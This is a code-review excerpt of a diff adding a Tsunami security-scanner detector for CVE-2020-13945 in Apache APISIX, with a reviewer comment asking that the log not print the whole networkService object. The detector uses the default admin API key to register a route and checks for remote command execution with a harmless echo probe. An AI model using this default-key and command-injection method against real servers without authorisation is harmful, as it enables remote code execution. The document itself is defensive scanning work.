community/detectors/apache_apisix_cve_2020_13945/src/main/java/com/google/tsunami/plugins/detectors/rce/cve202013945/Cve202013945Detector.java

```diff
@@ -0,0 +1,191 @@
+  private static final String TOKEN_HEADER_NAME = "X-API-KEY";
+  private static final String TOKEN_VALUE = "edd1c9f034335f136f87ad84b625c8f1";
+  private static final String EXECUTE_DATA = String.format("echo %s", DETECTION_STRING);
+
+  private final HttpClient httpClient;
+
+  private final Clock utcClock;
+
+  @Inject
+  Cve202013945Detector(@UtcClock Clock utcClock, HttpClient httpClient) {
+    this.httpClient = checkNotNull(httpClient);
+    this.utcClock = checkNotNull(utcClock);
+  }
+
+  private static boolean isWebServiceOrUnknownService(NetworkService networkService) {
+    return networkService.getServiceName().isEmpty()
+        || NetworkServiceUtils.isWebService(networkService);
+  }
+
+  private static StringBuilder buildTarget(NetworkService networkService) {
+    StringBuilder targetUrlBuilder = new StringBuilder();
+    if (NetworkServiceUtils.isWebService(networkService)) {
+      targetUrlBuilder.append(NetworkServiceUtils.buildWebApplicationRootUrl(networkService));
+    } else {
+      targetUrlBuilder
+          .append("http://")
+          .append(toUriAuthority(networkService.getNetworkEndpoint()))
+          .append("/");
+    }
+    return targetUrlBuilder;
+  }
+
+  @Override
+  public DetectionReportList detect(
+      TargetInfo targetInfo, ImmutableList<NetworkService> matchedServices) {
+    logger.atInfo().log("CVE-2020-13945 starts detecting.");
+
+    return DetectionReportList.newBuilder()
+        .addAllDetectionReports(
+            matchedServices.stream()
+                .filter(Cve202013945Detector::isWebServiceOrUnknownService)
+                .filter(this::isServiceVulnerable)
+                .map(networkService -> buildDetectionReport(targetInfo, networkService))
+                .collect(toImmutableList()))
+        .build();
+  }
+
+  private boolean isServiceVulnerable(NetworkService networkService) {
+    String targetVulnerabilityUrl = buildTarget(networkService).append(VUL_PATH).toString();
+    String randomVerifyPath = String.format("tsunami_%s", Instant.now(utcClock).toEpochMilli());
+    String targetExecuteUrl =
+        buildTarget(networkService)
+            .append(randomVerifyPath)
+            .append("?cmd=")
+            .append(URLEncoder.encode(EXECUTE_DATA, UTF_8))
+            .toString();
+    try {
+      HttpResponse httpResponse =
+          httpClient.sendAsIs(
+              post(targetVulnerabilityUrl)
+                  .setHeaders(
+                      HttpHeaders.builder()
+                          .addHeader(CONTENT_TYPE, MediaType.JSON_UTF_8.toString())
+                          .addHeader(TOKEN_HEADER_NAME, TOKEN_VALUE)
+                          .build())
+                  .setRequestBody(
+                      ByteString.copyFromUtf8(String.format(POST_DATA, randomVerifyPath)))
+                  .build());
+      if (httpResponse.status().code() == 201) {
+        logger.atInfo().log("Request payload to target %s succeeded", networkService);
```

Comment:
Do not log the entire `networkService` object, extract the target's basic info (such as hostname and port) instead